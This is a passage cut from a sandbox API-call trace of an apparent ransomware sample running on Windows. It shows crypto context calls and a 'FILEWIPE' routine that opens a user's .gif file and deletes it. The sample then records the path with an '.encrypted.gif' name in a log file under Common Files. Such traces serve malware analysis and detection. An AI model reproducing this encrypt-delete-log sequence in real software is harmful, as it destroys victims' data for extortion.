lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.704] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0030.704] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0030.705] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0030.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0030.705] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.705] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0030.705] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.705] FreeLibrary (hLibModule=0x754b0000) returned 1 [0030.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0030.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0030.707] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0030.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0030.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.707] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x162ba4e0, ftCreationTime.dwHighDateTime=0x1d5ba1b, ftLastAccessTime.dwLowDateTime=0x23f0900, ftLastAccessTime.dwHighDateTime=0x1d5c316, ftLastWriteTime.dwLowDateTime=0x23f0900, ftLastWriteTime.dwHighDateTime=0x1d5c316, nFileSizeHigh=0x0, nFileSizeLow=0xbf70, dwReserved0=0x0, dwReserved1=0x777648, cFileName="hGD17PyT.gif", cAlternateFileName="")) returned 0x7c2240 [0030.707] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0030.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0030.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0030.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0030.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.708] CharLowerBuffW (in: lpsz="byte[49008]", cchLength=0xb | out: lpsz="byte[49008]") returned 0xb [0030.708] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0030.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.708] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0030.708] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0030.708] FreeLibrary (hLibModule=0x76b40000) returned 1 [0030.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0030.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0030.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0030.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0030.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0030.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0030.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0030.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0030.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0030.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0030.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0030.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0030.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0030.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0030.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0030.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0030.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0030.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0030.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0030.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0030.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0030.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0030.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0030.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.709] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0030.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0030.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.709] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0030.709] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.709] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\clveu\\hgd17pyt.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0030.710] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0030.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0030.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0030.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0030.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0030.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0030.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0030.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0030.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0030.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0030.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0030.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0030.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0030.710] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0030.710] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.710] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.710] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.711] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0030.711] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.711] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.711] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.711] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif", lpFilePart=0x0) returned 0x4b [0030.711] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x162ba4e0, ftCreationTime.dwHighDateTime=0x1d5ba1b, ftLastAccessTime.dwLowDateTime=0x23f0900, ftLastAccessTime.dwHighDateTime=0x1d5c316, ftLastWriteTime.dwLowDateTime=0x12313200, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xbf70, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="hGD17PyT.gif", cAlternateFileName="")) returned 0x7c2240 [0030.711] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\clveu\\hgd17pyt.gif")) returned 1 [0030.712] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x162ba4e0, ftCreationTime.dwHighDateTime=0x1d5ba1b, ftLastAccessTime.dwLowDateTime=0x23f0900, ftLastAccessTime.dwHighDateTime=0x1d5c316, ftLastWriteTime.dwLowDateTime=0x12313200, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xbf70, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="hGD17PyT.gif", cAlternateFileName="")) returned 0 [0030.713] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0030.713] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.714] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0030.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0030.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0030.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0030.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0030.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0030.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0030.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0030.714] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0030.714] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0030.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0030.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0030.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.715] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0030.715] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0030.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0030.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.715] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0030.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0030.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0030.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0030.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.715] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0030.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0030.715] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0030.716] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.716] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0030.716] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.716] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0030.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x88ffb0 [0030.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.717] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0030.717] ReadFile (in: hFile=0x128, lpBuffer=0x936008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x936008*, lpNumberOfBytesRead=0x6aee3c*=0x4de, lpOverlapped=0x0) returned 1 [0030.718] ReadFile (in: hFile=0x128, lpBuffer=0x936008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x936008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0030.718] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x4de, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.718] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0030.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0030.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.encrypted.gif\r\n", cchWideChar=88, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 88 [0030.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x58) returned 0x794b90 [0030.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.encrypted.gif\r\n", cchWideChar=88, lpMultiByteStr=0x794b90, cbMultiByte=88, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.encrypted.gif\r\n", lpUsedDefaultChar=0x0) returned 88 [0030.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0030.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x794b90 | out: hHeap=0x770000) returned 1 [0030.718] WriteFile (in: hFile=0x128, lpBuffer=0x87a9d8*, nNumberOfBytesToWrite=0x57, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87a9d8*, lpNumberOfBytesWritten=0x6aee3c*=0x57, lpOverlapped=0x0) returned 1 [0030.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0030.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.718] CloseHandle (hObject=0x128) returned 1 [0030.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0030.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x936008 | out: hHeap=0x770000) returned 1 [0030.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0030.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0030.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0030.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0030.721] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0030.721] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: 